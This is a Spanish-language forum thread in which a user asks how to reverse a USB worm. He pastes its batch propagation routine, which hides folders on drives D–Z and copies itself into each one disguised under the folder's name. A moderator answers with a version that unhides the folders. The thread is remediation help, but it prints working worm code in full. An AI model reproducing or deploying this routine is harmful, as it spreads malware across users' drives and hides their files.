 Autor
|
Tema: como invertir el proceso de un WORM. reproduce carpetas exe en toda la pc. (Leído 3,038 veces)
|
raftv79
 Desconectado
Mensajes: 17
|
saludo....
quien me ayuda a invertir el proceso de este programa....
1.-- O diseñar un programa que borre todos los ejecutable con el nombre de la carpet donde reside.
2.-- O un programa que cuando entre un intruso lo bloquee o me avise que quiere entrar....
bueno muchas gracias......
@echo off
::Worm USB Prop.
::by Splendit
FOR %%A in (D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) DO (
IF "%~d0"=="%%A" GOTO :NEXT
CALL :USB
GOTO :NEXT
:USB
FOR %%A in (D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) DO (
IF EXIST %%A: (
FOR /F "TOKENS=5" %%B IN ('DIR %%A:^|FIND "DIR"') DO (
ATTRIB +H %%A:\%%B
COPY /Y %0 "%%A:\%%B.EXT"
)))
GOTO :EOF
:NEXT
START %~dp0\
::RESTO DEL CODIGO DEL WORM
::
PAUSE
EXIT
|
|
|
|
|
En línea
|
|
|
|
Novlucker
Ninja y
Colaborador
Desconectado
Mensajes: 10.683
Yo que tu lo pienso dos veces
|
1.-- O diseñar un programa que borre todos los ejecutable con el nombre de la carpet donde reside. Ese batch no es más que "la rutina" que utilizaría un batch para propagarse, es decir, solo se copia a todas las unidades y pone ocultos los archivos. Simplemente debes de devolver los archivos a la normalidad y ya, he incluso lo puedes hacer con el mismo código. ::Worm USB Prop. ::by Splendit FOR %%A in (D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z ) DO ( :USB FOR %%A in (D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z ) DO ( FOR /F "TOKENS=5" %%B IN (' DIR %%A: ^|FIND "DIR"' ) DO ( ATTRIB -H %%A:\%%B ))) :NEXT START %~dp0\ ::RESTO DEL CODIGO DEL WORM ::
Si te fijas solo he cambiado dos líneas 2.-- O un programa que cuando entre un intruso lo bloquee o me avise que quiere entrar.... Eso es lo que hace un antivirus Saludos
|
|
|
|
|
En línea
|
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez humana. Y de la primera no estoy muy seguro." Albert Einstein |
|
|
raftv79
Desconectado
Mensajes: 17
|
DISCULPA... PERO NO VI LO QUE HICISTE... POR FAVOR EXPLICAME. NO QUEDE MUY CLARO
|
|
|
|
|
En línea
|
|
|
|
Novlucker
Ninja y
Colaborador
Desconectado
Mensajes: 10.683
Yo que tu lo pienso dos veces
|
Mira mejor .. solo cambie las dos líneas debajo de .. FOR /F "TOKENS=5" %%B IN (' DIR %%A: ^|FIND "DIR"' ) DO (
Saludos |
|
|
|
|
En línea
|
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez humana. Y de la primera no estoy muy seguro." Albert Einstein |
|
|
raftv79
Desconectado
Mensajes: 17
|
Ya lo vi....
Hey muchas gracias.... De verdad.. Gracias...
Solo una pregunta mas...: antes de probarlo: solo borrará los ejecutable que se reproduce en cada carpeta y con el nombre de la misma y que tiene forma de carpeta? Verdad? Y disculpa mi ignorancia....
Nota del mod: no escribir en mayúsculas por favor, es = a gritar
|
|
|
|
« Última modificación: 27 Octubre 2009, 19:38 pm por Novlucker »
|
En línea
|
|
|
|
Novlucker
Ninja y
Colaborador
Desconectado
Mensajes: 10.683
Yo que tu lo pienso dos veces
|
No tengo idea, he puesto lo opuesto a tu script, pero eso no me asegura que si tienes un virus este haciendo algo más, para empezar ahí solo se copia a los directorios dentro de las unidades, pero no se si tiene icono de carpeta o no (diría que no ya que es un bat).
Saludos
|
|
|
|
|
En línea
|
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez humana. Y de la primera no estoy muy seguro." Albert Einstein |
|
|
|
 |
